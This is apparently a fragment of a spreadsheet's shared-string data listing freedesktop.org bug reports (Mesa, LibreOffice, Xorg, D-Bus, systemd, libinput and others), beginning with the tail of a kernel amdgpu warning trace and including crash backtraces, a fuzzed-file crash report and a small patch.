[ 5261.569667] Code: ff 74 16 f0 ff 0f 0f 88 db e5 14 00 75 0b 89 04 24 e8 e8 1f f8 d1 8b 04 24 48 8b 54 24 38 48 8b 5c 24 08 48 89 13 e9 0b fd ff ff  ff eb 88 e8 1a 15 a7 d1 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 
[ 5261.569681] ---[ end trace 700e4f5bfa6fddf5 ]---
[ 5261.569753] WARNING: CPU: 0 PID: 25480 at drivers/gpu/drm/amd/amdgpu/amdgpu_vm.c:1641 amdgpu_vm_bo_update_mapping+0x3dd/0x3f0 [amdgpu]
[ 5261.569754] Modules linked in: rfcomm fuse xt_CHECKSUM ipt_MASQUERADE nf_nat_masquerade_ipv4 tun nf_conntrack_netbios_ns nf_conntrack_broadcast xt_CT ip6t_rpfilter ip6t_REJECT nf_reject_ipv6 xt_conntrack ip_set nfnetlink ebtable_nat ebtable_broute bridge stp llc ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle ip6table_raw ip6table_security iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack devlink libcrc32c iptable_mangle iptable_raw iptable_security ebtable_filter ebtables ip6table_filter ip6_tables cmac bnep sunrpc vfat fat arc4 iwlmvm mac80211 snd_hda_codec_realtek snd_hda_codec_hdmi snd_hda_codec_generic snd_hda_intel iwlwifi snd_hda_codec edac_mce_amd btusb snd_hda_core btrtl btbcm kvm btintel snd_hwdep bluetooth snd_seq irqbypass snd_seq_device
[ 5261.569766]  cfg80211 crct10dif_pclmul snd_pcm joydev mxm_wmi wmi_bmof crc32_pclmul snd_timer ecdh_generic ghash_clmulni_intel snd rfkill soundcore ccp sp5100_tco pcspkr shpchp i2c_piix4 k10temp wmi acpi_cpufreq binfmt_misc amdgpu chash i2c_algo_bit gpu_sched drm_kms_helper ttm drm crc32c_intel alx hid_holtek_mouse mdio
[ 5261.569772] CPU: 0 PID: 25480 Comm: gallium_drv:0 Tainted: G        W        4.15.0-rc2+ #27
[ 5261.569772] Hardware name: Gigabyte Technology Co. Ltd. X399 AORUS Gaming 7/X399 AORUS Gaming 7 BIOS F2 08/31/2017
[ 5261.569773] task: 0000000045d1804c task.stack: 00000000e1257dad
[ 5261.569785] RIP: 0010:amdgpu_vm_bo_update_mapping+0x3dd/0x3f0 [amdgpu]
[ 5261.569787] RSP: 0018:ffffa3c751d83998 EFLAGS: 00010212
[ 5261.569787] RAX: ffff987a86604258 RBX: ffff987a9942e000 RCX: ffff987a73d86550
[ 5261.569788] RDX: 0000000000000004 RSI: ffff987a86604258 RDI: ffffa3c744d83700
[ 5261.569788] RBP: ffff987a73d80000 R08: 0000000000000c18 R09: 0000000000000004
[ 5261.569788] R10: 0000000000030000 R11: 0000000000000c0d R12: 0000000000000ace
[ 5261.569789] R13: ffff987a73d86560 R14: 0000000000151400 R15: 0000000000000000
[ 5261.569789] FS:  00007fcd9f7fe700(0000) GS:ffff987a9de00000(0000) knlGS:0000000000000000
[ 5261.569790] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 5261.569792] CR2: 00007f2581124010 CR3: 00000001bbe09000 CR4: 00000000003406f0
[ 5261.569792] Call Trace:
[ 5261.569794]  ? _cond_resched+0x15/0x40
[ 5261.569795]  ? __ww_mutex_lock.isra.2+0x42/0x640
[ 5261.569807]  ? amdgpu_vm_free_mapping.isra.23+0x20/0x20 [amdgpu]
[ 5261.569819]  amdgpu_vm_clear_freed+0xbb/0x190 [amdgpu]
[ 5261.569833]  amdgpu_gem_object_close+0x19c/0x210 [amdgpu]
[ 5261.569839]  ? drm_gem_object_release_handle+0x2c/0x90 [drm]
[ 5261.569842]  drm_gem_object_release_handle+0x2c/0x90 [drm]
[ 5261.569846]  ? drm_gem_object_handle_put_unlocked+0xb0/0xb0 [drm]
[ 5261.569847]  idr_for_each+0x48/0xe0
[ 5261.569851]  drm_gem_release+0x1c/0x30 [drm]
[ 5261.569854]  drm_release+0x342/0x3b0 [drm]
[ 5261.569857]  __fput+0xcd/0x1d0
[ 5261.569858]  task_work_run+0x81/0xa0
[ 5261.569859]  do_exit+0x2de/0xba0
[ 5261.569864]  ? drm_ioctl_kernel+0x59/0xb0 [drm]
[ 5261.569865]  do_group_exit+0x3a/0xa0
[ 5261.569866]  get_signal+0x26c/0x570
[ 5261.569867]  do_signal+0x36/0x610
[ 5261.569868]  ? do_vfs_ioctl+0xa1/0x610
[ 5261.569869]  ? SyS_futex+0x12d/0x180
[ 5261.569870]  exit_to_usermode_loop+0x69/0xa0
[ 5261.569871]  syscall_return_slowpath+0xbf/0xd0
[ 5261.569872]  entry_SYSCALL_64_fastpath+0x7b/0x7d
[ 5261.569872] RIP: 0033:0x7fceb27696dc
[ 5261.569873] RSP: 002b:00007fcd9f7fd620 EFLAGS: 00000246 ORIG_RAX: 00000000000000ca
[ 5261.569873] RAX: fffffffffffffe00 RBX: 0000000008bc2028 RCX: 00007fceb27696dc
[ 5261.569874] RDX: 0000000000000000 RSI: 0000000000000080 RDI: 0000000008bc2050
[ 5261.569874] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000008020100
[ 5261.569874] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000008bc2000
[ 5261.569875] R13: 0000000001687f40 R14: 0000000000000000 R15: 0000000008bc2050
[ 5261.569875] Code: ff 74 16 f0 ff 0f 0f 88 db e5 14 00 75 0b 89 04 24 e8 e8 1f f8 d1 8b 04 24 48 8b 54 24 38 48 8b 5c 24 08 48 89 13 e9 0b fd ff ff  ff eb 88 e8 1a 15 a7 d1 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 
[ 5261.569890] ---[ end trace 700e4f5bfa6fddf6 ]---
[ 5271.969130] [drm:amdgpu_job_timedout [amdgpu]] *ERROR* ring sdma0 timeout last signaled seq=135113 last emitted seq=135115
[ 5271.969137] [drm] No hardware hang detected. Did some blocks stall?</t>
  </si>
  <si>
    <t>LIBREOFFICE-45031</t>
  </si>
  <si>
    <t>Visio import: vertically aligned text is shown horizontally</t>
  </si>
  <si>
    <t>Created attachment 55902
Example in visio
When importing a Visio file that contains objects with a label that is shown vertically the text is imported as a separate text object of which the text is shown as horizontal text in Draw. This text object is placed in such a manner that it is no longer visually connected to the shape it is associated with. Attached a file made in Visio 2003 and some screenshots (in later submits) of the resulting import in Draw 3.5.0RC1.
I don't know enough of the internals of libvisio to know about the reason why it is implemented like this but wouldn't it be more logical to make use of the text property that shapes have instead of creating separate objects for labels?
Anyway thanks very much for creating libvisio! For a first version I am impressed with how well it works.</t>
  </si>
  <si>
    <t>hdv.jadev</t>
  </si>
  <si>
    <t>MESA-7391</t>
  </si>
  <si>
    <t>Memory leak detected in _mesa_HashInsert with cairo-dock</t>
  </si>
  <si>
    <t>Using last cairo-dock SVN :
http://www.gnome-dock.org/trac
I obtained a Memory leak detection (I use r300 driver) with this night Mesa cvs :
./cairo-dock                  
Mesa: CPU vendor: GenuineIntel
Mesa: MMX cpu detected.
Mesa: SSE cpu detected.
Mesa: Not testing OS support for SSE leaving enabled.
Mesa 6.5.1 implementation error: Memory leak detected in _mesa_HashInsert
Please report at bugzilla.freedesktop.org
Try R300_SPAN_DISABLE_LOCKING env var if this hangs.</t>
  </si>
  <si>
    <t>popolon</t>
  </si>
  <si>
    <t>TELEPATHY-20846</t>
  </si>
  <si>
    <t>[New Errors page doesn't actually include error strings</t>
  </si>
  <si>
    <t>http://telepathy.freedesktop.org/spec/errors.html doesn't actually include the DBus error names of each error but only includes strings like Encryption Not Available.</t>
  </si>
  <si>
    <t>DRI-48435</t>
  </si>
  <si>
    <t>[SNB eDP] Screen goes blank 30 seconds into boot</t>
  </si>
  <si>
    <t>Created attachment 59646
Xorg.0.log dmesh xrandr message
OS:  Debian unstable
uname -r: 3.3.0-trunk-amd64
libdrm version: 2.4.33-1 (from dpkg)
Computer:  Dell Inspiron One 2320
Chipset:  Unknown
When booting the system the screen goes blank.  I can login and startx blind.  Then I see the graphics screen only with bright light.  The screen is blinking on and off.  After an unspecified time (usually several hours) the screen turns on.  The screen is unstable. It turns off when executing xrandr or attempting to shutdown from the panel icon. When I return to the terminal (ctrl-alt-F1) I can see the text and execute any commands that do not call X.  The only way to return to X is to reboot and follow the above steps again.</t>
  </si>
  <si>
    <t>jheaton5</t>
  </si>
  <si>
    <t>XORG-1358</t>
  </si>
  <si>
    <t>[XKB] symbol ISO_Prev_Group does not work in a cycle while ISO_Next_Group does</t>
  </si>
  <si>
    <t>There is a problem (and people report it). ISO_Next_Group works in a cycle (for
example 0-1-2-0-1-2) while ISO_Prev_Group works acyclically (2-1-0 and no
more changes). 
For the hint on how to fix see: http://listserv.bat.ru/xkb/Message/215.html</t>
  </si>
  <si>
    <t>LIBFPRINT-84734</t>
  </si>
  <si>
    <t>imgdev: fix enum mismatch for dev_change_state() call</t>
  </si>
  <si>
    <t>Created attachment 107453
patch
Fix enum mismatch in imgdev call to dev_change_state
Patch originally posted at:
http://lists.freedesktop.org/archives/fprint/2014-June/000603.html
Tested and verified at:
http://lists.freedesktop.org/archives/fprint/2014-June/000607.html</t>
  </si>
  <si>
    <t>POLICYKIT-23924</t>
  </si>
  <si>
    <t>Crashes in eggdbus on error</t>
  </si>
  <si>
    <t>Using this little bit of code from gnome-lirc-properties:
        # Check whether the process is authorized:
        pid = os.getpid()
        (is_auth details) = self.policy_kit.CheckAuthorization(
                        ('unix-process' {'pid': dbus.Int32(pid variant_level=1)})
                        action_id {} dbus.UInt32(0) '' timeout=600)
        logging.debug('%s: authorized=%r' action_id is_auth)
I manage to crash polkitd (git master) with eggdbus-0.5-2.x86_64
#0  _egg_dbus_error_encode_gerror (error=0x235ac70) at eggdbuserror.c:135
135	  if (strcmp (domain_as_string EggDBusError) == 0)
Missing separate debuginfos use: debuginfo-install expat-2.0.1-6.x86_64 glib2-2.21.6-1.fc12.x86_64 gvfs-1.3.4-2.fc12.x86_64 libattr-2.4.43-3.fc11.x86_64 libcap-2.16-4.fc11.1.x86_64 libselinux-2.0.80-1.fc11.x86_64
(gdb) bt
#0  _egg_dbus_error_encode_gerror (error=0x235ac70) at eggdbuserror.c:135
#1  0x0000003d7cc287c1 in egg_dbus_method_invocation_return_gerror (method_invocation=0x237bb80 error=0x235ac70) at eggdbusmethodinvocation.c:342
#2  0x00007f330f5685b1 in check_auth_cb (source_object= res= user_data=) at polkitbackendauthority.c:632
#3  0x00007f330f56ae00 in polkit_backend_interactive_authority_check_authorization (authority=0x2353ed0 caller=0x23635a0 subject= action_id= details= flags= cancellable=can't compute CFA for this frame
)
    at polkitbackendinteractiveauthority.c:492
#4  0x00007f330f56824e in authority_handle_check_authorization (instance= real_subject= action_id= real_details= flags= cancellation_id= 
    method_invocation=0x237bb80) at polkitbackendauthority.c:700
#5  0x00007f330f576629 in handle_method_call (message= interface=) at _polkitauthority.c:2309
#6  handle_message (message= interface=) at _polkitauthority.c:2857
#7  0x0000003d7cc2067c in filter_function_handle_method_call (user_data= dmessage= dconnection=) at eggdbusconnection.c:2213
#8  filter_function (user_data= dmessage= dconnection=) at eggdbusconnection.c:294
#9  0x0000003819610496 in dbus_connection_dispatch (connection=0x2377530) at dbus-connection.c:4406
#10 0x0000003d7bc098d5 in message_queue_dispatch (source= callback= user_data=) at dbus-gmain.c:101
#11 0x0000003d768392ae in g_main_context_dispatch () from /lib64/libglib-2.0.so.0
#12 0x0000003d7683cc98 in ?? () from /lib64/libglib-2.0.so.0
#13 0x0000003d7683d0e5 in g_main_loop_run () from /lib64/libglib-2.0.so.0
#14 0x00000000004009f2 in main (argc= argv=) at main.c:59
(gdb) p domain_as_string
$1 = (const gchar *) 0x0</t>
  </si>
  <si>
    <t>XORG-7018</t>
  </si>
  <si>
    <t>non-anonymous cvs repository for lib broken?</t>
  </si>
  <si>
    <t>checking out lib using my account on fd.o leads to this error:
deville% cvs -q -d herrb@cvs.freedesktop.org:/cvs/xorg co lib
cvs checkout: failed to create lock directory for `/cvs/xorg/lib/X11'
(/cvs/xorg/lib/X11/#cvs.lock): Permission denied
cvs checkout: failed to obtain dir lock in repository `/cvs/xorg/lib/X11'
cvs [checkout aborted]: read lock failed - giving up
Exit 1
Since libX11 is now handled in git I guess someone touched (removed made
read-only ?) lib/X11 in CVS manually.</t>
  </si>
  <si>
    <t>XORG-9629</t>
  </si>
  <si>
    <t>Files under GPL License</t>
  </si>
  <si>
    <t>The following files in the xorg-server package are under the GPL license:
xorg-server-1.1.1/hw/kdrive/neomagic/backend.c
xorg-server-1.1.1/hw/kdrive/neomagic/backend.h
Seems like it would be a good thing to see if the original author would agree
to make these files available under the X11 license.</t>
  </si>
  <si>
    <t>MESA-89057</t>
  </si>
  <si>
    <t>[IVB 10.4]Piglit spec_ARB_gpu_shader5_arb_gpu_shader5-interpolateAtOffset-nonconst fails</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform: IVB
Libdrm:         (master)libdrm-2.4.59-8-gccbb9aa887f992359335ecf2d26919b04e14e63f
Mesa:           (10.4)54da987baec25fbaf6975c93f197ddbfe65a303c
Xserver:     (server-1.16-branch)xorg-server-1.16.3-6-g0722a8043c89e7224c398eef270611cc65c1e219
Xf86_video_intel:   (master)2.99.917-100-g5b033d638bbf2c0b841088ca75f9eb8de5852cb5
Libva:          (master)f9741725839ea144e9a6a1827f74503ee39946c3
Libva_intel_driver:     (master)9a20d6c34cb65e5b85dd16d6c8b3a215c5972b18
Bug detailed description:
---------------------------
It fails on mesa 10.4 branch works well on master branch. In earlier automation testing it pass but I am unable to reproduce the pass.
output:
libGL: screen 0 does not appear to be DRI3 capable
libGL: pci id for fd 4: 8086:0152 driver i965
libGL: OpenDriver: trying /opt/X11R7/lib/dri/tls/i965_dri.so
libGL: OpenDriver: trying /opt/X11R7/lib/dri/i965_dri.so
Probe color at (30)
  Expected: 0.000000 1.000000 0.000000
  Observed: 0.000000 0.764706 0.000000
PIGLIT: {result: fail }
output on master:
libGL: OpenDriver: trying /opt/X11R7/lib/dri/tls/i965_dri.so
libGL: OpenDriver: trying /opt/X11R7/lib/dri/i965_dri.so
PIGLIT: {result: pass }
==Reproduce steps==
---------------------------- 
1. xinit
2. bin/arb_gpu_shader5-interpolateAtOffset-nonconst -auto -fbo</t>
  </si>
  <si>
    <t>MESA-99019</t>
  </si>
  <si>
    <t>Star Ruler 2 game will freeze the system</t>
  </si>
  <si>
    <t>Overview:
Star Ruler 2 freezes the system immediately after choosing New Game. This forces the user to hit the reset on the computer.
Steps to reproduce:
The game will load to the menu screen and as soon as you double click for New Game the system will freeze. 
Linux and Hardware:
This problem has been experienced on Ubuntu 16.10 -- using AMD's R9 Fury RX470 and RX470 graphic cards. 
Mesa Builds:
The problem has been reproduced on Mesa 13.0.2 (git-2722144) and Mesa 13.0.1 (git-f2f487e)</t>
  </si>
  <si>
    <t>LIBREOFFICE-79139</t>
  </si>
  <si>
    <t>Crash in SwDropCapCache::CalcFontSize</t>
  </si>
  <si>
    <t>Created attachment 99662
Repro file
When opening a mutated DOCX file an ASan build of LO 4.4.0.0 alpha0 will crash:
Program received signal SIGFPE Arithmetic exception.
0x00007fffa9746e9b in SwDropCapCache::CalcFontSize (this= pDrop= rInf=...) at /home/moggi/devel/libo7/sw/source/core/text/txtdrop.cxx:717
rax            0xbd740  776000
rbx            0xf200f2f2f200f201       -1008539191274835455
rcx            0x7ffffffe2280   140737488233088
rdx            0x0      0
rsi            0x10007fff4308   17594333479688
rdi            0x7ffffffe1860   140737488230496
rbp            0x7ffffffe2670   0x7ffffffe2670
rsp            0x7ffffffe18c0   0x7ffffffe18c0
   0x00007fffa9746e93 :    mov    0x710(%rsp)%rcx
=&gt; 0x00007fffa9746e9b :    idivq  (%rcx)
   0x00007fffa9746e9e :    mov    0x738(%rsp)%rdx
Original OO file: www.asep.org%2Fasep%2Fasep%2FEvery_Day_Is_Another_Day.docx
Mutated OO file (repro file): crash-30894.docx
Modified XML file: word/styles.xml
Modifications:
- in tag w:rFonts attribute w:eastAsiaTheme was switched from minorHAnsi to %s%n%s%n%s%n%s%n%s%n
- in tag w:sz attribute w:val was switched from 22 to PPPPPPPPPPPPPPPPPPPPPPPPPPPPPP...
- in tag w:lsdException attribute w:qFormat was switched from 1 to 0</t>
  </si>
  <si>
    <t>DRI-9308</t>
  </si>
  <si>
    <t>Mesa git vbo_0_1_branch not working at all with an r300 card</t>
  </si>
  <si>
    <t>I've tried to compile and install the mesa vbo_0_1_branch that should support
vbo and other cool features for my r300 ATi card btw after installing the new
data and restarting X I got some problems: first of all it rebooted while kdm
was trying to load Beryl then loading a basic (with no composite managers) X
session I've tried to run firstly glxinfo (which seemed to be ok) then running
glxgears I got therse errors:
libGL warning: 3D driver claims to not support visual 0x4b
*********************************WARN_ONCE*********************************
File radeon_vtxfmt_a.c function r300MapBuffer line 576
Unknown access type
***************************************************************************
glxgears: vbo/vbo_save_api.c:204: map_vertex_store: Assertion
`vertex_store-&gt;buffer' failed.
The mesa dev list talked about this problem maybe btw there have been no fixes:
http://sourceforge.net/mailarchive/message.php?msg_id=37414813
Please someone could continue this work?! :)
THANKS!</t>
  </si>
  <si>
    <t>TELEPATHY-36050</t>
  </si>
  <si>
    <t>Do not keep a pointer to an unreferenced object</t>
  </si>
  <si>
    <t>Created attachment 45369
Do not keep a pointer to an unreferenced object
Do not keep a pointer to an unreferenced object</t>
  </si>
  <si>
    <t>SYSTEMD-79692</t>
  </si>
  <si>
    <t>intltool and gettext required to build systemd from archive</t>
  </si>
  <si>
    <t>Hi
The README file from systemd says it only needs intltool when building from git but that does not seem to be true since the IT_PROG_INTLTOOL() call in configure.ac basically makes the ./configure break if intltool is not present...
I hacked around this by downloading the intltool-* Perl scripts and putting them in my path but that didn't help since then the build broke because I didn't have gettext available. So even if --disable-nls is passed to ./configure the build will require gettext.
I think the correct solution would be for the files generated by intltool to be included in the make dist archive. This is the same as it's done with the files generated by autoconf automake libtool and is probably what the README file was implying... But even if that's fixed by including them in the dist_* lists (or removing them from the nodist_* lists in the Makefile.am files) there's still the issue of configure breaking if it doesn't find the tools...
I'm wondering to what extent this is a systemd build issue or an intltool bug but I thought I'd report it here first.
I'll try to look into other packages that use intltool to see if any of them fixes this issue in a more elegant way.
Cheers
Filipe</t>
  </si>
  <si>
    <t>filbranden</t>
  </si>
  <si>
    <t>LIBREOFFICE-62592</t>
  </si>
  <si>
    <t>TDFÂ Site : Fresh channel should include warning about being an early state iteration of LO</t>
  </si>
  <si>
    <t>On many localized sites I see a download recommendation for 4.0.1 without any warnings. That is unacceptable lightheaded 4.0.1 is the first bug correction after 4.0.0. what really only was for hardboiled early testers.
Please add a hint for whom this version can be recommended (still early interested testers) like on 
and add a link direct ink to 3.6.5 for normal users on the same page
[de][sr] link for 3.6.5 not prominent enough
[eo][tr] should not show green checkbox for 4.0.1
[sv] Missing warning missing prominent link to 3.6.5
[zh-cn] should not show green checkbox for 4.0.1
[vi][zh-tw] Missing warning should not show green checkbox for 4.0.1 Missing prominent link to 3.6.5
I only added some examples hire it's too expensive for me to write down all results. More or less all localized websites have at least one of following problems:
a) missing warning (early testers only)
b) missing prominent link to 3.6.5 for normal users
c) checkbox on green circle for 4.0.1 or 4.0.0</t>
  </si>
  <si>
    <t>TELEPATHY-26827</t>
  </si>
  <si>
    <t>build fails with gtk-doc enabled</t>
  </si>
  <si>
    <t>There's a copypasta error in the sections.txt that breaks the build fixed by this commit:
http://git.collabora.co.uk/?p=user/smcv/telepathy-glib-smcv.gita=commitdiffh=4ef4ea20525710
While fixing that I also cleaned up some other gtk-doc warnings in branch smcv/gtk-doc. If you don't want to review the non-essential commits please leave this bug open and downgrade it to minor.</t>
  </si>
  <si>
    <t>POPPLER-104263</t>
  </si>
  <si>
    <t>Qt5: Add cancellation support to renderToImage and textList</t>
  </si>
  <si>
    <t>Created attachment 136172
Qt5 cancellable support
The attached patch uses the already existant support in Gfx.cc to be able to cancel a renderToImage or textList if the user is no longer interested in it.</t>
  </si>
  <si>
    <t>XORG-18517</t>
  </si>
  <si>
    <t>[GM965] the screen is corrupted with opengl applications (blender or vlc)</t>
  </si>
  <si>
    <t>Created attachment 20282
corrupted screen with opengl app
Hi
I have hp pavilion dv6000 laptop with 965 GM graphics running OpenSUSE 11 64
bit.
Xorg version 7.4 from OpenSUSE XOrg/openSUSE_11.0/ repository.
While running opengl applications (blender or vlc with output type set to OpenGL) the screen is highly corrupted - see attached screenshot.
For reference the original issue were http://bugs.freedesktop.org/show_bug.cgi?id=18489 with xorg 7.3 - the system did hang in such situations (but there were no corruption).</t>
  </si>
  <si>
    <t>benderamp</t>
  </si>
  <si>
    <t>MESA-86089</t>
  </si>
  <si>
    <t>[r600g][mesa 10.4.0-dev] shader failure - r600_sb::bc_finalizer::cf_peephole() when starting Second Life</t>
  </si>
  <si>
    <t>Compiling November 10th build of git master for rv6xx:
kernel: 3.18.0-0.rc3.git2.2.fc22.1.x86_64
mesa-dri-drivers-10.4-0.devel.100.20141110.fc21.x86_64 (custom using Fedora's .spec file)
I am using R600_DEBUG=hyperz
I get the following crash:
Program received signal SIGSEGV Segmentation fault.
0x00007fffe916bb4e in r600_sb::bc_finalizer::cf_peephole (this=this@entry=0x7fffffffb350) at sb/sb_bc_finalize.cpp:877
877                             c-&gt;jump_target = static_cast(c-&gt;jump_target-&gt;next)
Full stack dump attached</t>
  </si>
  <si>
    <t>LIBREOFFICE-73620</t>
  </si>
  <si>
    <t>Presenter console: Notes's button don't work Notes view is missing</t>
  </si>
  <si>
    <t>Created attachment 92065
Note's vew is not here. Only Notes 's button change (color change to grey/white hightlight)
In LibreOffice 4.2.0.2 Build ID: 601a398b803303d1a40a3299729531824fe0db56
We could no see the note view in presenter console.
1) Add a secondary monitor to your computer
2) Open an odp
3) Launch via F5
4) Click on Notes's button: no action. Only the button is highlight on white/grey (see the mouse on the attachement)
Workform:
6) Exit the slideshow (echap or other)
7) Launch again
8) You have presenter console with the Notes's view</t>
  </si>
  <si>
    <t>vulcain</t>
  </si>
  <si>
    <t>DBUS-45106</t>
  </si>
  <si>
    <t>dbus-daemon doesn't use all configured auth mechanisms but the first one always</t>
  </si>
  <si>
    <t>Created attachment 56006
patch
I wouldn't say it's blocker but still critical. In the configuration file there is  option and the documentation says dbus-daemon will respect them all but in real the first one  option is used always.
The patch is super simple. Somebody who wrote the related code had added int i counter variable but forgot to increase it while iterating over the list of defined auth mechanisms.</t>
  </si>
  <si>
    <t>xaka2004</t>
  </si>
  <si>
    <t>MESA-100876</t>
  </si>
  <si>
    <t>Variable GALLIUM_HUD_DUMP_DIR is not working with Wine LFS</t>
  </si>
  <si>
    <t>Hello Devs
I wanted to create some scripted/automated benchmark but seems like the visible(correctly generated) data won't save into the dump files however they were created.
I used the following command:
GALLIUM_HUD_DUMP_DIR=/media/ramdisk/ GALLIUM_HUD=fpscpu /usr/share/playonlinux/playonlinux --run LFS
The ownerships are fine glxgears were able to generate data but it depends on the exitcode as I experienced.
I'm using rolling Arch with:
linux 4.10.11-1
mesa 17.0.4-2
wine-gaming-nine 2.3-1
xorg-server 1.19.3-2
It's working if I disable the Gallium nine in the settings.
Thank you</t>
  </si>
  <si>
    <t>vinibali1</t>
  </si>
  <si>
    <t>DBUS-16621</t>
  </si>
  <si>
    <t>enables PIE which often doesn't work on odd platforms</t>
  </si>
  <si>
    <t>dbus 1.2.1 compiles on NetBSD/macppc but then won't run.  It bails with the following error:
[disciple@arcusv:disciple]$ /usr/pkg/bin/dbus-daemon --version
/usr/pkg/bin/dbus-daemon: Unsupported relocation type 6 in non-PLT 
relocations
I assume I want to avoid all PIC and PIE arguments at compile time but I can't find a simple way of doing so.  Passing --without-pic or --with-pic=no to configure doesn't seem to work for me.
Regards
Dave</t>
  </si>
  <si>
    <t>dhgutteridge</t>
  </si>
  <si>
    <t>WAYLAND-101796</t>
  </si>
  <si>
    <t>Keys can get stuck permanently when grabbing keyboard with evdev</t>
  </si>
  <si>
    <t>The logic in evdev.c (https://github.com/wayland-project/libinput/blob/688142c8a22c00cfe7b9dec6a71e935b899d8b65/src/evdev.c#L167-L169) remembers how many times a key is pressed simultaneously and only emits KEY_UP events when this counter is incremented to 1 and KEY_DOWN when it is decremented to 0.
This is problematic as key release events might get dropped for example if the keyboard is exclusively grabbed by evdev's EVIOCGRAB while a key is pressed.
This issue is easily reproducible by launching one instance of libinput-debug-events (or any libinput-based application that reads keyboard input) and then running this in another terminal:
libinput-debug-events --device /path/to/keyboard --grab  killall libinput-debug-events)
Because you submit the command by pressing the Enter key and libinput-debug-events launches fast enough the release event for your Enter key happens after the device is grabbed so the first instance of libinput-debug-events will not receive it. Because of this bug the Enter key is now permanently stuck there as it is always pressed either 1 or 2 times so libinput will never send any key events for it again.
(Please note that running this test inside any libinput-based desktop environment (xf86-input-libinput or Wayland) obviously triggers the same bug and may force you to restart your window manager.)
In other implementations (xf86-input-evdev Microsoft Windows) missing release events are handled gracefully: As pressing an already held key indicates a missing release event they just ignore this so a subsequent key release event actually releases the key.</t>
  </si>
  <si>
    <t>noah.bergbauer</t>
  </si>
  <si>
    <t>MESA-108829</t>
  </si>
  <si>
    <t>[meson] libglapi exports internal API</t>
  </si>
  <si>
    <t>Seems like we're missing visibility flags here. We export 39 symbols instead of 19.
Might be having a look throughout mesa comparing the meson and autotools builds.
Personally I use `nm -CD --defined-only` but objdump and others can also be utilised -)</t>
  </si>
  <si>
    <t>CONSOLEKIT-18046</t>
  </si>
  <si>
    <t>crashes in file_monitor_remove_watch() (NULL item?)</t>
  </si>
  <si>
    <t>Hi!
We get a lot of bug reports about crashes with this signature:
g_hash_table_remove_internal (hash_table=0x9237db8 key=0x0 notify=1)
file_monitor_remove_watch (monitor=0x9240d60 watch=0x0) at ck-file-monitor-inotify.c:245
ck_file_monitor_remove_notify (monitor=0x9240d60 id=2) at ck-file-monitor-inotify.c:529
ck_tty_idle_monitor_stop (monitor=0x9243980) at ck-tty-idle-monitor.c:211
ck_session_finalize (object=0x92490e0) at ck-session.c:855
http://launchpadlibrarian.net/17571430/Stacktrace.txt has a complete and fully symbolic stack trace. It seems that in some cases file_monitor_remove_watch() is called with watch == NULL which leads to this crash.
The dodgy approach would be to just test for this condition in file_monitor_remove_watch() but I guess watch == NULL is a this should not happen(TM) case and there is a deeper logic error?</t>
  </si>
  <si>
    <t>LIBREOFFICE-36453</t>
  </si>
  <si>
    <t>LibreOffice 3.4 Beta 2 Calc doesn't show status bar</t>
  </si>
  <si>
    <t>I build LO 3.4 Beta 2 from source and I haven't got status bar in calc. More accurately I have status bar but there is no info on it.
Screen shot is in attachment</t>
  </si>
  <si>
    <t>alenyashka</t>
  </si>
  <si>
    <t>XORG-44354</t>
  </si>
  <si>
    <t>Crash in Mach64UploadToScreen on ATI 3D Rage II+</t>
  </si>
  <si>
    <t>Turning on the EXA acceleration for the mach64 driver on the ATI 3D Rage II+ creates a segfault as soon as anything serious (for example xterm or gdm) opens on the X server. Note that the mach64 driver does not support DRI for the card.
The segfault appears in Mach64UploadToScreen() in atimach64exa.c to be specific in the memcpy(). Debugging reveals that pDst-&gt;devPrivate.ptr of the Pixmap passed in is NULL and hence the driver crashes. Playing with various options in the Device section of the X server does not change the situation except turning off acceleration or changing the acceleration mode from EXA to XAA. Note that the card is slow in any event but any type of acceleration would be welcome.
While it is unclear to me why libexa passes in a NULL Pixmap destination pointer to the call the following patch seems to fix or work around the problem:
    char  *dst        = pDst-&gt;devPrivate.ptr
+   if (dst == NULL)
+        return FALSE
    int    dst_pitch  = exaGetPixmapPitch(pDst)
    int bpp    = pDst-&gt;drawable.bitsPerPixel
    int cpp    = (bpp + 7) / 8
    int wBytes = w * cpp
A similar patch should also be applied to Mach64DownloadFromScreen() for similar reasons. Probably the bug is not in the mach64 driver but in libexa or any other component of X not passing in valid pointer in first place.</t>
  </si>
  <si>
    <t>thor</t>
  </si>
  <si>
    <t>DRI-87347</t>
  </si>
  <si>
    <t>[BSW]175 igt/kms_flip cases and 41 igt/pm_rpm cases sporadically cause: *ERROR* The master control interrupt lied (PM)!</t>
  </si>
  <si>
    <t>Created attachment 110887
dmesg
==System Environment==
--------------------------
Regression: Yes
good commit: 372ee59699d9704086dadb084209542d10e28851
bad commit: a505177768ef542012b031575ef919371b8a7b3b
Non-working platforms: BSW
==kernel==
--------------------------
drm-intel-next-queued/a505177768ef542012b031575ef919371b8a7b3b
drm-intel-nightly/b4c22753430d6d71438bc861695e08732f5b947f
drm-intel-fixes/b0616c5306b342ceca07044dbc4f917d95c4f825
==Bug detailed description==
--------------------------
It causes [   90.286286] [drm:gen8_gt_irq_handler.isra.15 [i915]] *ERROR* The master control interrupt lied (PM)! on BSW with drm-intel-nightly and drm-intel-next-queued ernel. It has bug 85908 on drm-intel-fixes kernel.
run ./pm_rpm --run-subtest cursor
output:
IGT-Version: 1.9-g6262f35 (x86_64) (Linux: 3.18.0_drm-intel-nightly_b4c227_20141215+ x86_64)
Runtime PM support: 1
PC8 residency support: 0
Subtest cursor: SUCCESS (10.132s)
==Reproduce steps==
---------------------------- 
1. ./pm_rpm --run-subtest cursor</t>
  </si>
  <si>
    <t>MESA-30684</t>
  </si>
  <si>
    <t>[r300g][OpenVG] OpenVG demos fail to render properly</t>
  </si>
  <si>
    <t>lion_x11: all i see is counterclockwise rotating black figure which stops if i move the window and then start rotating again. it disappears if i maximize window to fullscreen.
sp_x11: just a black figure on white background.</t>
  </si>
  <si>
    <t>XORG-4190</t>
  </si>
  <si>
    <t>Missing dependencies</t>
  </si>
  <si>
    <t>After building the server touch dix/dispatch.c then run make again. libdix
is correctly rebuilt but none of the servers are relinked even though one of
their dependencies changed.
There are likely other instances of this problem.</t>
  </si>
